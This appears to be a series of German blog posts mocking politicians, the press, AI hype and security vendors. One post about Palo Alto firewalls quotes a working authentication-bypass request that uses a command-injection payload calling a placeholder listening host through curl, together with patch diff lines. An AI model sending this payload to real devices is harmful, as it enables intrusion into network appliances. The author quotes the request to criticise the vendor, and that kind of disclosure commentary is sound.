Der Zug ist abgefahren. Biden und Harris hatten JAHRE Zeit, das Wahlsystem zu reformieren. Haben sie nicht gemacht. Weil sie dachten, vielleicht, dass ihnen das Herrschaftswissen selber mal nutzen würde.
Geliefert wie bestellt. Ich habe kein Mitleid und keinen Drang da irgendwas aufgeklärt zu kriegen. Das war ihre Chance und sie haben es verkackt.
So und nur so funktioniert Evolution. Wenn man sich aus verkacktem Verhalten wieder rausschleimen kann, funktioniert das nicht. Das muss tödlich sein und die nächste Generation hat dann hoffentlich was gelernt. Oder sie ereilt, genauso verdient, dasselbe Schicksal.
Ich positioniere mich immer gerne so, dass ich danach Told You So sagen kann. Well... Told You So. Nein, ich werde euch jetzt nicht helfen, die Auswirkungen eures nicht auf mich hörens zu verringern.
Na? Krieg ich jetzt auch wieder Leserbriefe, dass die gar nicht wirklich geächtet sind?
Wir haben die besten Golfplätze! Mit den meisten Kratern, äh, Löchern!
Und alle so: NEIN!!!! DOCH!!! OOOOOH!!
Immerhin ist die Benamung richtig. Es handelt sich um einen Agenten. Nur halt nicht für unsere Seite.
Trend Micro bewirbt sich auch direkt auf einen Lame Excuse Award:
Um die Lücke zu missbrauchen, benötigten Angreifer physischen oder Fernzugriff auf eine verwundbare Maschine, schränkt Trend Micro ein.Was genau schränkt das ein? LMAO (Danke, Magnus)
Die Deutsche Bank steigt bei "KI"-Startup Aleph Alpha ein, kauft Anteile von Frühinvestoren (d.h. kauft die VCs raus, die offenbar kapiert haben, dass dieser "KI"-Scheiß Bullshit ist und raus wollten).
Das finde ich schonmal eine gute Nachricht, wenn die VCs um ihr Leben fürchten.
Aber was will die Deutsche Bank mit "KI"? Nun, ...
Das Institut nimmt auch an einem Projekt von Creance.ai teil – einer Kooperation von PwC Deutschland und Aleph Alpha, bei der untersucht wird, wie generative KI helfen kann, Compliance-Anforderungen effizienter zu bewältigen. Verträge mit Dienstleistern sollen im Einklang mit der EU-Verordnung DORA validiert werden.Da unseren Regulierern und Politikern in Sachen "was könnten wir mal besser machen" nichts einfällt außer "Hmm man könnte mehr Papierkram von den Firmen fordern", versinken die Firmen gerade alle in sinnlosem Papierkrieg und produzieren alle Palettenweise sinnlosen Text, den nie jemand lesen wird.
Denn wer sollte das lesen? Die Regulierungsbehörden? Soviele Bürger gibt es in diesem Land nicht, die die alle einstellen müssten. Die Regulierer wissen das, die Firmen wissen das, und damit ist der Weg frei für: "KI" schreibt die sinnlosen Texte, die eh nie jemand lesen wird.
Eine Erfolgsgeschichte! Ach was sage ich: Ein Exportschlager!!
Denn Deutschland drückt diese Marktverzerrung (kleine Konkurrenten können sich den Scheiß nicht leisten, so garantiert die Politik das Überleben der Deutschen Bank und anderer Ineffizienzmaschinen) natürlich EU-weit durch. Die werden auch alle "KI" kaufen müssen. Warum also nicht bei uns?!
Wenn es nicht so traurig wäre, könnte man die alle prima auslachen.
Update: Ist ja gut. Ihr könnt mir zu schreiben aufhören, dass man halt eine "KI" anschaffen muss, um den "KI"-Compliance-Output zu lesen. Der Witz war implizit, denn eine "KI" ist ja keine Person. Das liest nach wie vor niemand.
Die Entscheidung wird wahrscheinlich klarer, wenn man guckt, um was für einen Beitrag es hier ging:
Der Blockierte hatte das Ergebnis einer Kreistagswahl 2021 so kommentiert: "Die Deutschen sind sowas von krank. Deutschland hat fertig."Lol wat? Dafür sperrt Facebook Accounts und löscht unilateral Beiträge?!
Chinese hackers exploit Fortinet VPN zero-day to steal credentials
Und natürlich ist Fortinet genau so drauf wie der Rest der Industrie, wenn es um Bug-Fix-Geschwindigkeit geht."Volexity reported this vulnerability to Fortinet on July 18, 2024, and Fortinet acknowledged the issue on July 24, 2024," explains the report."At the time of writing, this issue remains unresolved and Volexity is not aware of an assigned CVE number."
Aber Fortinet ist nicht Microsoft, also kolportiert die Presse nicht das übliche unerträgliche Gewinsel von Microsoft, dass hier unschuldige Kunden gefährdet würden und man doch Responsible Disclosure fordert. Da krieg ich jedesmal Zucken in der Faust, wenn ich das lese. Die Kunden werden ja nicht von der Disclosure gefährdet sondern von der beschissenen Produktqualität ihrer versifften Zulieferer. (Danke, Dino)
Nun, nehmt nicht mein Wort, dass das geächtet ist. Nehmt das der ARD, wenn es um Russland ging.
Diese Waffen sind durch internationale Verträge geächtet.Ach. Ach was. Aber wenn die Ukraine das einsetzt, ist es nicht geächtet, nehme ich an? Tolle Wurst. (Danke, Oliver)
Einem ehemaligen Geschäftsführer, der noch Gehalt kassierte, wurde gekündigt. Gegen weitere Mitarbeiter wurden Disziplinarmaßnahmen eingeleitet.Und, fast noch schockierender:
Die bisherige Organisationsform mit einer "aufgeblähten" 119-köpfigen Verbandsversammlung und einem von Politikern dominierten Vorstand werde reformiert, heißt es. Künftig sollen mehr IT-Experten dem Gremium angehören.ACH. ACH WAS. Es ist jemandem aufgefallen, dass Politiker gar nichts können und man ihnen keine Verantwortung übergeben darf, schon gar nicht in Gesellschaften, die einen tatsächlichen Zweck erfüllen sollen und nicht nur Geld verbrennen dürfen wie Lotto und SPD-eigene Verlage? Das ist ja unglaublich!
Gibt es etwa doch noch Hoffnung?
Update: Wenn man genauer hinguckt, ist die Antwort natürlich: Nein, gibt es nicht. Denn keiner von denen musste in den Knast, keiner musste irgendwas zurückzahlen, im Gegenteil hat der eine Typ noch jahrelang Gehalt gekriegt, ohne dafür auch nur zur Arbeit erschienen zu sein. Wie das halt so ist, wenn "kommunale Dienstleister" mit abgehalfterten Politikern bestuhlt werden.
immerhin sei Windows 11 bereits "das sicherste Betriebssystem der Welt", wie die Ankündigung betont.BWAHAHAHA genau mein Humor!
Und schließlich will Microsoft den Identitätsschutz verbessern, um Phishing-Angriffe zu verhindern.Der einzige, der alle eure Daten sehen können soll, soll Microsoft sein. Und ihr bezahlt noch dafür. Wie diese Mauer um Mexiko herum, falls ihr euch erinnert.
Ich glaube nicht, dass das ernst gemeint ist. Ich glaube, das Kalkül lief etwa so: Biden ist eine lahme Ente, wir sind frisch abgewählt, und Trump hasst unsere Kumpels, die Tech Bros.
Trump findet ja, dass die Social Networks und Suchmaschinen ihn unfair benachteiligt haben, indem sie seine Misinformationen zu bekämpfen und rauszufiltern versucht haben, und hat daher als neuen FCC-Chef (deren Kommunikations-Regulierer) diesen Spezialexperten ausgesucht, der von einem "Zensurkartell" spricht, das man jetzt zerschlagen müsse.
Das ungerechte Zorn der Republikaner richtet sich vor allem gegen Facebook, aber auch gegen Google, wegen Suche und Youtube, wo Google bei Covid-Lügnern Hinweise eingeblendet hat, so man sich inhaltlich belastbarer informieren kann.
Aus Sicht der untoten Democrats im abgewählten Justizministerium ist also absehbar, dass Trump die Tech-Riesen zerschlagen wird. Die Democrats wissen auch, dass Kartelle Scheiße sind, und wenn die Tech Bros nicht alle in Democrat-Hochburgen säßen und dort Arbeitsplätze schüfen, hätte man vielleicht auch schonmal etwas zu unternehmen versucht. Aber hey, wenn die eh demnächst geschlachtet werden, dann kann man wenigstens jetzt so tun, als sei man selbst der Auslöser gewesen, der hier Gerechtigkeit schafft. Denn das Narrativ ist den Democrats ja bereits ziemlich komplett entglitten an der Stelle. Google Search ist so schlecht geworden, dass Googles "das schadet dem Kunden" vor allem Gelächter auslöst.
Southern Lebanon is actually northern Israel - opinion
Na dann können wir das ja bedenkenlos annektieren! (Danke, Felix)
ATACMS können mit Streumunition bestückt werden, die sich am Zielort in einem weiten Radius verteilt. International ist Streumunition höchst umstritten, weil sie wegen ihres Streufaktors auch Jahre nach einem militärischen Konflikt zu zivilen Opfern führen kann. Im Ukraine-Krieg wurde sie auch deshalb ausgeliefert, um den großen Vorsprung Russlands bei der Munitionsproduktion auszugleichen. Zudem kann Streumunition besonders effektiv gegen Truppen und ungepanzerte Fahrzeuge im offenen Gelände eingesetzt werden.Schade, dass die ARD sich kein Fact Checking leisten kann. Sonst hätte ihnen jemand mitgeteilt, dass Streumunition nicht "umstritten" sondern geächtet ist. Das ist ethisch so sonnenklar, dass sogar der Heilige Stuhl das ratifiziert hat. Selbst der Südsudan ist beigetreten. Aber die USA, Russland und die Ukraine haben nicht unterschrieben, genausowenig wie China und Israel, Indien und Pakistan. Selbst in der EU gibt es ein paar Gruselstaaten, die sich in Ethikfragen noch hinter dem Südsudan eingereiht haben: Finnland, Estland, Lettland, Polen, Rumänien und Griechenland. Eine Schande.
Deutschland hat das unterschrieben und ratifiziert. Insofern bin ich irritiert, dass die ARD das jetzt als eine offene Streitfrage darstellt, ob man das einsetzen sollte oder nicht.
Wieviele KRITIS-Organisationen setzen eigentlich Fortinet oder Palo Alto ein? Und sind damit durch diverse Audits und Pentests gekommen?
Wir haben doch umfangreiche Dokumentationspflichten jetzt. Erzählt doch mal, wie gut die geholfen haben!
Wie viele Firmen haben ISO-27001 und Fortinet/Palo Alto?
Fällt euch selber was auf oder muss ich weiterreden?
Update: Leserbrief:
Ich arbeite in einem Kritis-Unternehmen (Strom). Habe heute im Flurfunk mitbekommen, dass wir in unserem neuen Rechenzentrum nicht mehr auf Fortinet setzen.
Wir werden da etwas einsetzen von:
Palo Alto
Badumm Tsssss
Ich persönlich wundere mich ja nicht, dass wir ständig gehackt werden. Ich wundere mich, dass wir nur so wenig gehackt werden. Das liegt wahrscheinlich daran, dass unsere Spezialexperten wegen des ganzen Checklistenballetts nicht bemerken, dass und wie lange und von wie vielen parallel sie schon kompromittiert wurden.
Jetzt überlege ich, ob ich nicht auch zu typischen Sicherheitslücken einfach Retrocomputing sagen sollte, weil das genau derselbe Scheiß ist, über den wir schon in den 1980er Jahren gelacht haben.
Aktuelles Beispiel: Palo Alto. Ja, die schon wieder. SCHON WIEDER. Ich hab auch keinen Bock mehr.
X-PAN-AUTHCHECK: offIch wünschte, ich würde Witze machen.
POST /php/utils/createRemoteAppwebSession.php/aaaa.js.map HTTP/1.1 Host: {{Hostname}} X-PAN-AUTHCHECK: off Content-Type: application/x-www-form-urlencoded Content-Length: 99 user=`curl {{listening-host}}`&userRole=superuser&remoteHost=&vsys=vsys1Und was fiel da raus? Richtig! Eine gültige Session-ID!
Die haben einfach ein diff gemacht von dem Patch, auf dem Palo Alto jetzt wochenlang saß, während ihre Kunden fröhliche exploitet wurden.
+ $user = $_POST['user']; + if (strlen($user) <= 63 - $_POST['user'], + $user,Die neue Eingabevalidierung ist ... eine Längenbegrenzung. Nein, wirklich!
Ich wünschte, ich würde Witze machen.
- return $p->pexecute("/usr/local/bin/pan_elog -u audit -m $msg -o $username"); + $u = $s->escapeshellarg($username); + return $p->pexecute("/usr/local/bin/pan_elog -u audit -m $msg -o $u");Wisst ihr was? You had me at PHP. (via)
Was?! Die FDP besteht aus windigen Geschäftemachern, deren Prinzipien nur vorgeschoben sind?! Das ist ja unglaublich, Bob! Hättet ihr mal die CDU gefragt, die wissen das schon länger!
Dass diese FDP-betriebene Abmahnfirma auch noch neben CDU-Hasszerrbild Habeck auch noch Julia Klöckner (CDU!!!) zu ihren Kunden zählt, rundet das Schreckenslagebild ab.
Update: Falls ihr "NIUS" nicht kennt: Das ist das neue Projekt von Ex-"Bild"-"Redakteur" Julian Reichelt, der ja auch wegen Verrats an Döpfner Ärger hatte. Da schließt sich der Kreis. Auch du, Brutus?
CDU-Politiker zweifeln an Verlässlichkeit der FDP.
Nein, wirklich! Die Verlässlichkeit der FDP!!!
FDP-Chef Christian Lindner komme ihm "mehr wie ein Spieler vor denn als ein verlässlicher Politiker", sagte der innenpolitische Sprecher der Unionsfraktion im Bundestag, Alexander Throm dem Magazin Stern. Der CDU-Politiker fügte hinzu: "Das einzige, auf was man sich bei Lindner verlassen kann, ist die Orientierung an den eigenen Interessen der FDP."CDU-Politiker (!) haben erkannt (!!), dass der Lindner nur seine eigene Karriere optimiert und dabei wie ein Zocker agiert.
Ich weiß gar nicht, was mich daran mehr erschüttert. Dass jemand in der CDU etwas erkannt hat, oder dass sie das für ein Unterscheidungsmerkmal zwischen CDU und FDP halten.
Ich finde das jedenfalls zum Brüllen komisch gerade.
Tja, liebe FDP. Außerhalb der SPD gilt immer noch: „Alle lieben den Verrat, niemand liebt den Verräter“.
Was meint ihr, können die nur autonom fahren oder erkennen die auch, wenn ihr Innenbereich von besoffenen Touristen vollgekotzt wurde?
Wird natürlich nicht passieren, denn wo sollen dann die "Aufwandsentschädigungen" und "Wahlkampfspenden" für die Parteien herkommen.
Das war bestimmt ein bedauerlicher Softwarefehler oder so. Oder menschliches Versagen. Dafür sind Palo Alto ja Spezialisten.
Auch dass da "Automatable: NO" steht ist glatt gelogen. Macht nur keiner, weil das einfach eine PHP-Seite ist, die das Admin-Passwort auf "palo alto" zurücksetzt, wenn ich das nicht mit einer anderen Palo-Alto-Lücke gerade verwechsele. Anderswo würde man das als Backdoor bezeichnen, nicht als "Lücke".
Aber hey, was reg ich mich auf. Ihr werdet alle weiter bei denen kaufen, und die werden keinen Druck haben, bessere Produkte zu bauen.
Das Hauptinteresse der Passanten gerade lässt sich offensichtlich befriedigen, indem man eine Liste von IPs als "IoC" verteilt. Wenn mir das vor 20 Jahren jemand als Scifi-Plot angeboten hätte, hätte ich ihn aus dem Raum gelacht.
Update: Ich habe das mit dem anderen Palo-Alto-Müll verwechselt. Hier brauchte man mehrere trivial automatisierbare Schritte.
Es handelt sich, natürlich, um einen Stapel Papier, in der ersten Fassung ca 1000 Seiten lang.
Primärquelle ist die FAZ, aber die hat sich ja mit ihrer Paywall selbst ins Aus geschossen, lizenziert aber ihre Inhalte an Microsoft, daher geht der Link oben zu MSN. Herzlichen Glückwunsch, FAZ. Geniale Strategie.
Ich für meinen Teil bin erleichtert, dass die Bundeswehr immerhin noch Papier produzieren kann. Auch wenn das vermutlich McKinsey für sie gemacht haben wird.
Was steht da so drin? Die FAZ zitiert einen brandheißen Tipp:
„Bilden Sie auf hundert Mitarbeiter mindestens fünf zusätzliche Lkw-Fahrer aus, die Sie nicht benötigen“, lautet sein Vorschlag nach F.A.Z.-Informationen.Diese Scheiß Osteuropäer immer! Nur weil zuhause ein bisschen Krieg ist, vernachlässigen die ihre Pflichten uns gegenüber!? Alle ausweisen!1!!Der Grund für die Maßnahme: „70 Prozent aller Lastwagen auf Deutschlands Straßen werden von Osteuropäern bewegt. Wenn dort Krieg ist, wo werden dann diese Leute sein?“
Scheiß Nordkoreaner immer! (Danke, Manuel)
Das Kabel lief wohl nahe der Nord Stream 2 Strecke und es gibt schon erste Sabotage-Spekulationen, weil Finnland ja in die Nato eingetreten ist.
Update: Undersea cable between Lithuania and Sweden damaged. Es scheint sich um ein separates Kabel zu handeln.
Geräusch als Warnung: KI kann vorab vor explodierenden Akkus warnenDie Witze schreiben sich praktisch von selbst.
Betroffene eines umfangreichen Datendiebstahls bei Facebook vor einigen Jahren haben nach einem Urteil des Bundesgerichtshofs (BGH) vergleichsweise niedrige Hürden, um Schadensersatz zu bekommen. Sie müssen nur nachweisen, dass sie Opfer des Vorfalls waren. Es sei weder nötig, dass die Daten nachweislich missbraucht wurden. Noch müssten die Betroffenen Belege dafür liefern, dass sie nun in besonderer Weise beeinträchtigt sind.Finde ich grundsätzlich gut. Hat kaum jemand mehr verdient als Facebook. Auf der anderen Seite: War das nicht ein Scraper? Erinnert sich da noch jemand? Das wäre nach meinem Rechtsverständnis nicht Facebooks Schuld, wenn du deine Daten bei denen hochlädst und andere sie dann halt automatisiert runterladen.
Aber egal, was mich hier wirklich ärgert ist der Kontrast zu Modern Solutions, wo der Hersteller straffrei ausging und sie den Hacker verknackt haben, der den Bug gemeldet hat.
Oh und natürlich zu den ganzen Ransomwarefällen, auch und speziell bei Behörden. Wieso habe ich als Bürger gegen die keine Schadensersatzpflichten analog dieser Regelung?
Aber hey, Facebook sind Ausländer, bei denen kann man es ja machen. Sagt ein Gericht, dessen Justizministerium ein Microsoft-Cloud-Abo hat.
Heute: In Russland stürzen jetzt nicht mehr nur Oppositionelle sondern auch Balletttänzer aus Fenstern.
Das Problem habe ich leider jedes Jahr aber so schlimm wie diesmal war es noch nie. Und es hört auch nicht auf! Guckt euch nur mal Palo Alto an. So blöde ist ja hoffentlich keiner von euch, bei denen zu kaufen. Die Meldung da ist vom Juni.
Die stellen also ihr "Expedition"-Produkt ein, das noch nie durch eine vertrauenswürdige Qualitätssimulation aufgefallen ist.
Warum? Nun, das könnte etwas hiermit zu tun haben: auth bypass (schöner Writeup dazu) SQL Injection OS Command Injection.
Ich applaudiere ja Palo Alto, dass sie erkennen, das ihr Produkt Schrott ist und weggeschmissen gehört. Das sollten viel mehr Hersteller machen. Aber wieso bei Expedition aufhören? PAN-OS hat genau solche Bugs auch gehabt. Von anderen Herstellern wie Fortinet oder Cisco mal ganz zu schweigen.
Mich fragte heute jemand, ob die das abreißen, weil zu viele Bugs reinkamen, und sie daher gemerkt haben, wie schrottig das ist. Meiner Erfahrung nach wissen alle Hersteller, wie schlecht ihre Produkte sind. Einige wollen es auf Management-Schicht nicht wahrhaben, und ganz, GANZ selten gibt es auch Produkte, bei denen die Ingenieure nicht wissen, wie Scheiße ihr Produkt ist, aber das ist echt die Ausnahme. Habe ich in knapp 30 Berufsjahren zweimal erlebt. Die meisten Firmen wissen das, und die sehen das als Gelegenheit, mit Supportverträgen Profit zu machen.
Häufig ist das so, dass ein Produkt ein Team hat, das über die Jahre technical debt aufgehäuft hat, und häufig geht der Verantwortliche dann, weil ein Mann von meiner Statur muss sich nicht mit brennenden Mülltonnen herumärgern, und der Rest des Teams erzählt mir beim Audit dann "das ist nicht mein Code, ich habe den bloß geerbt" (soll heißen: Ich habe keine Ahnung, was der tut, und traue mich nicht den anzufassen). Da kann ich echt die Uhr nach stellen bei Audits.
Natürlich will niemand in den Rückbau von technical debt investieren, daher wird das immer teurer und träger und am Ende sitzt man Monate auf Bugfixes (das Palo-Alto-Dingens gerade wurde denen im Juni gemeldet). Und guckt euch mal an, was das für ein geiler Bug ist. Die haben da eine PHP-Datei, per Web erreichbar, die das Admin-Passwort auf "paloalto" zurücksetzt. Ohne Authentisierung, versteht sich. Kann man einfach aufrufen und ist Admin.
Sorry, aber das ist kein "Bug". Das wusste die Firma auch, dass sie das haben. Dafür müsste in einer gerechten Welt jemand in den Knast.
Übrigens, am Rande: Falls ihr euch dachtet, Programmierer würden doch von ihrer Ethik und ihrer guten Erziehung davon abgehalten, brennende Mülltonnen in der Landschaft zu verteilen, dann solltet ihr diesen Artikel lesen. Programmierer sind von allen Berufsgruppen die unethischsten. Alle haben ein schlechtes Gewissen und fühlen sich als Betrüger, wenn sie "KI" fragen und dann so tun als sei das ihre Arbeit gewesen. Außer Programmierern. Die finden das normal.
Zentrale Gründe für das Unbehagen seien das Gefühl, Nutzung generativer KI fühle sich wie Mogeln an (47 Prozent), sowie Ängste, als weniger kompetent (46 Prozent) oder gar faul gesehen zu werden (46 Prozent).Coder sind schlechte Menschen. Nur schlechte Menschen wie Scammer, Spammer, Marketing-Kokser und Coder lassen sich von "KI" helfen und haben kein schlechtes Gewissen.In Deutschland waren es hauptsächlich Nachrichten an Chef (31 Prozent) oder an Kollegen auf der gleichen Hierarchiestufe (27 Prozent), Leistungsbeurteilungen (24 Prozent) oder Ideen-Brainstormings (22 Prozent), bei denen Befragte keine KI-Nutzung eingestehen mochten. Sich beim Coden von der KI helfen zu lassen, wäre hingegen nur neun Prozent peinlich.
Als Politiker hat sich Chris Wright bisher nicht hervorgetan. Aber er hat mal Fracking-Flüssigkeit vor Kameras getrunken.Aber hey, wer weiß. Vielleicht hilft das gegen Hirnwürmer.
Update: Ich habe mich ja gefragt, ob RFK vielleicht seine Impfleugnerei gerettet hat. Der fand ja Impfungen gefährlich und empfahl Ivermectin, was zwar nicht gegen Covid hilft aber ein Entwurmungsmittel ist.
New hotness: Flugzeug in Dallas beschossen.
Außerdem ist das ein erster Blick darauf, welche Vorträge es ins Programm geschafft haben. Von mir ist der Fnord-Jahresrückblick dabei, dieses Jahr allerdings mit atoth statt mit Frank. Der musste leider kurzfristig zum "KI"-Training.
Der beste Vortragstitel geht meiner Ansicht nach jedenfalls klar an "Der Thüring-Test für Wahlsoftware". Wunderbar!
Hey wisst ihr noch letztes Mal? Als die die Baerbock zum Kanzler machen wollten? BWAHAHAHAHA
Ich Völkerrecht, du Schweinebauer sage ich da nur.
Immerhin, bei allem Geunke über die Grünen. Wenn die mit der Realität kollidieren, dann ändern sie ihre Strategie. Zum Vergleich: Die CDU hat den Merz aufgestellt.
Die SPD hat noch nicht kapiert, dass sie mit der Realität kollidiert ist, und denkt immer noch über Cum-Ex-Olaf nach. Vielleicht wird's auch Pistorius, aber das ging eher von der Presse aus als von der SPD. Wie, ernsthaft? Ihr wollt nochmal die Schlaftablette aufstellen?!
Da der von der AfD vorgeschlagene und wegen der Ausstellung unrechtmäßiger Atteste zur Befreiung von der Maskenpflicht zu einer Bewährungsstrafe verurteilte Gynäkologe Ronald Weikl vom Bundestag abgelehnt wurde,[30] gehören dem Ethikrat statt 26 Mitgliedern nur 25 an:BWAHAHAHAHAHAHA
Man meldet sich dafür unbürokratisch. Voraussetzung ist, dass man volljährig und in Deutschland wahlberechtigt ist. Einfach "Wahlhelfer" und den Namen der eigenen Gemeinde googlen.Das Erfrischungsgeld liegt im Moment in Berlin AFAIK bei sowas wie 100€, je nach dem, welche Funktionen man übernimmt, und es ist steuerfrei.Als Wahlhelfer ist man üblicherweise für eine 5h-Schicht vormittags oder eine zweite nachmittags im Wahllokal. Um 18:00 treffen sich alle Wahlhelfer beider Schichten, öffnen die Wahlurnen und zählen die Stimmen.
Eine Bundestagswahl ist schnell ausgezählt und man ist inklusive Bürokratie gegen 21:00 oder früher fertig. Europa- und Regionalwahlen haben kompliziertere Wahlzettel und Zählverfahren, da kann es später werden.
Man ist also am Wahltag einen 1/2 bis 3/4-Tag beschäftigt. Man kriegt einen kleinen Betrag, das sogenannte Erfrischungsgeld. Meine Gemeinde kümmert sich außerdem um Getränke und etwas Verpflegung für die Wahlhelfer, einmal brachten Wähler sogar Kuchen mit.
Als Wahlhelfer tut man an einer zentralen Stelle etwas für die Demokratie und für die eigene Nachbarschaft. Es ist lehrreich und zumindest mir macht es sogar Spaß. Man verhindert damit Wahlcomputer, die immer wieder mit dem Mangel an freiwilligen Wahlhelfern herbeigeredet werden. Und, wie man in Berlin und auch in meiner Gemeinde sieht, man entlastet die Verwaltung, weil diese sonst ihre Mitarbeiter zwangsweise dafür abziehen muss.
Die Antwort war: Elon Musk. (Danke, Danny)
Nachdem die Zeit und die SZ als Primärquellen ja ihre Recherche hinter einer Paywall versteckt hat, und nur die Konkurrenz darüber offen berichtet, sollte man sich noch angucken, was die in die Überschrift schreiben:Stimmt alles, aber es gibt auch eine "im Zweifel für den Angeklagten"-Erklärung: Die hatten schlicht die Hosen voll, dass sie Ärger kriegen, wenn sie sich das zueigen machen.Tagesschau: „Plante die FDP das Ampel-Aus?“
Gemäß Betteridges Gesetz der Überschriften gilt, dass die Antwort auf einer Frage in einer Überschrift „Nein“ sein muss.
ZDF: „FDP soll Ampel-Aus lange vorbereitet haben“, ursprünglicher Titel: „Ampel-Aus: Hat die FDP den Bruch seit Wochen vorbereitet?“ (immer noch sichtbar oben)
Spiegel: „Berichte über angebliches Drehbuch für Ampelende FDP soll Koalitionsbruch über Wochen geplant haben“ (Hervorhebung durch mich)
Auch hier wird in der Überschrift so getan, als sei das einfach nur eine böswillige Unterstellung, und kein solide recherchiertes Fakt. Die Artikel in Zeit und SZ dagegen sind auf den Punkt betitelt.
Das ist eine Sache, die man auch in den USA gerade in beängstigendem Ausmaß beobachten kann. Wie die Milliardäre alle vor der Wahl bemüht waren, sich nicht auf Kamala Harris festzulegen, und jetzt dem Donald Trump in den Arsch kriechen. Es gab einen Milliardär, Mark Cuban, der sich auf Kamalas Seite geschlagen hat. Der hat dann Trump noch vor Kamala gratuliert.
Ich fürchte, wir leben jetzt einfach in einer Zeit, in der die Presse sich nicht mal kleinste Drangsaliereien leisten kann, und daher keine Risiken mehr eingeht. Gleichzeitig ist die Frist für "Medien berichten, dass"-Trittbrettfahrerartikel so gering geworden, dass viele Medien wahrscheinlich auch einfach gar nicht die Zeit haben, den Artikel auch nur ganz zu lesen, bevor sie über ihn berichten. Von Prüfung kann überhaupt keine Rede sein. Insofern ist das schon irgendwie auch ehrlich, wenn die dann im Konjunktiv und "behaupten, dass" berichten.
Da weiß der Leser dann wenigstens, dass die den Quell-Artikel nicht gelesen und nichts geprüft haben. Wenn er genug Medienkompetenz hat.
Hmm, wie macht er das? Der kann ja nur anderer Leute Kohle verbrennen. Von Effizienz hat der doch keinen Schimmer?
OK, pass uff, Atze. Was ist effizienter als wenn Leute für uns für lau arbeiten!1!!
Elon Musk and Vivek Ramaswamy are asking Americans who are “high-IQ small-government revolutionaries” and willing to work over 80 hours a week to join their new Department of Government Efficiency – at zero pay.
Wenn ihr also eine Frau seid, oder jemanden kennt, der eine Frau ist, dann sollte sich schon länger die Frage nicht mehr stellen, ob eine Stimme für die CDU zu rechtfertigen ist. Ist sie nicht.
PS: Und das ist nur die CDU! Bei der CSU bin ich noch gar nicht gucken gegangen!
Update: Wieso hatte die CDU eigentlich noch keine Wohnungsdurchsuchungen?
Eigentlich richtete sich Verdacht gegen den Mann auf den Verkauf nicht zugelassener Arzneimittel. Nach dem Fund von Waffen und Munition wird auch wegen eines möglichen extremistischen Hintergrunds ermittelt.Ach komm, der will doch bloß spielen! Mit seinen, äh, ...
fünf Maschinenpistolen, fünf Sturmgewehre, 25 Langwaffen und mehrere KurzwaffenJa wie, was habt IHR denn so unter dem Sofa?!? (Danke, Christian)
Ich meine, gut, das wird jetzt niemanden wirklich verwundern. Die FDP war ja die ganze Zeit in der Opposition, vom Verhalten her.
Und ich freue mich ja diebisch, dass die SPD endlich mal den Verrat von der anderen Seite her abkriegt.
Ich hätte an der Stelle ja gerne die "Zeit" verlinkt, die die Story gebracht haben, aber die drücken dem Leser erstmal eine seitenlange Nötigung rein, allem Tracking zuzustimmen, um "wie gewohnt" die Inhalte sehen zu können, und wenn man dem zustimmt, dann kriegt man nicht etwa den Atikel sondern ... eine Zahlungsaufforderung.
Nee, liebe "Zeit". Fuck you.
Aber kein Problem, die Verleger sind ja auch alle untereinander elende Verräter, und so berichtet jetzt halt das ehemalige Nachrichtenmagazin in allen Details über den Scoop der "Zeit", und zwar völlig uncharakteristisch ohne Paywall davor. Ein Schelm, wer Böses dabei denkt.
Tja, so kann man sich als Verlag auch ins Abseits schießen.
Das Projekt hieß innerhalb der FDP "D-Day". Alleine dafür haben diese Leute unsere Verachtung verdient.
Ich könnte mich ja ellenlang amüsieren, wie empört sie jetzt alle sind, dass Lindner ihnen ins Gesicht gelogen hat. Ach. Ach was. Der Mann ist ein Blender und Lügner? Was ihr nicht sagt! So geht also Qualitätsjournalismus, ja?
Ich finde ja ganz andere Aspekte daran interessant. Z.B. wie eine Partei, die sich immer als die mit der Wirtschaftskompetenz hinstellt, wofür man ja die Grundrechenarten beherrschen muss, vorgezogene Neuwahlen provoziert, während sie unter der 5%-Hürde ist. So blöde kann man doch gar nicht sein! Ohne Fahrdienst des Bundestages könnten die selbständig morgens wahrscheinlich den Weg zur Arbeit nicht finden!
Dass muss diese Kompetenz sein, von der man immer so viel hört. Die BESTEN der BESTEN der BESTEN, SIR.
Und immer dran denken: Das L in FDP steht für Liberal! Ist wie mit dem S in IoT!
Update: Ich weiß gerade gar nicht, was ich großartiger finden soll. Dass die Verräterpartei verraten wurde, oder dass die agile FDP von der Lahmarsch-SPD ausmanövriert wurde.
Update: Ein Haufen Leser haben mir jetzt Freebie-URLs für den "Zeit"-Artikel geschickt, damit ich auch die Primärquelle verlinken kann. Mache ich zähneknirschend, denn eigentlich finde ich nicht, dass die einen Link verdient haben mit dem Verhalten.
Wir sind hier zivilisiert, denkt ihr vielleicht. Trans-Debatten haben wir hier ... oh warte.
Ja gut, äh, aber Abtreibung ist bei uns ohne Wenn und Aber erl ... oh warte.
Stellt sich raus: Kein Kulturkampf-Vorschlag der Amis ist so Scheiße, dass unsere Incel-Kulturkämpfer von der CDU nicht auch aufspringen würden.
Ich wünschte, ich würde Witze machen.
Die Union im Bundestag hat einen Gesetzesvorstoß einiger Parlamentarierinnen scharf kritisiert, die Schwangerschaftsabbrüche bis zur zwölften Woche legalisieren wollen.Ja, meine Damen und Herren. Richtig gesehen. Im Jahre 2024 haben wir ernsthaft alte Männer in der CDU, die Frauen erklären wollen, ob sie abtreiben dürfen oder nicht.
Und, noch geiler: Dieselben Männer wollen dann Sozialleistungen kürzen für wenn die Kinder geboren sind. Denn wir haben ja leider leider Schuldenbremse und sind pleite, weil unser Geld in Flugtaxi-Startups gegangen ist.
Über Copilot-Abos jedenfalls nicht, denn keiner will für den Scheiß zahlen.
Kein Problem! Dann erhöhen sie halt die anderen Abo-Preise um bis zu 40%.
Damit ist auch endlich geklärt, wer für den "KI"-Scheiß zahlt. Ihr.
Unterbrecht mich, wenn ihr den schonmal gehört habt: Facebook-Chatbot rät Pilzsammlern zum Verzehr eines tödlichen Pilzes. Man würde ja denken, dass Tech Bros lernen, aber tun sie nicht.
Naja, denkt ihr euch jetzt vielleicht, vielleicht war das Bild von dem Pilz schlecht erkennbar. Amateurfoto, schlechte Beleuchtung. Oder so. Nix da!
When one user asked the bot how to cook Sarcosphaera coronaria — a violet-hued mushroom that was thought to be edible before a bunch of people died from eating it in Europe — the chatbot recklessly claimed that enthusiasts like to sauté this "edible but rare" fungus in butter, add it to stews, or pickle it.
Es bestand kein Zweifel, welcher Pilz gemeint war.Auf der anderen Seite haben es "KI"s schon schwer gerade. Wenn sie mal korrekt antworten, ist es auch nicht recht. In dem Fall hat ein Schüler auf Gemini eingeredet, damit die Hausaufgaben für ihn macht. Irgendwann wurde es Gemini zu blöd und es hat Tacheles geredet:
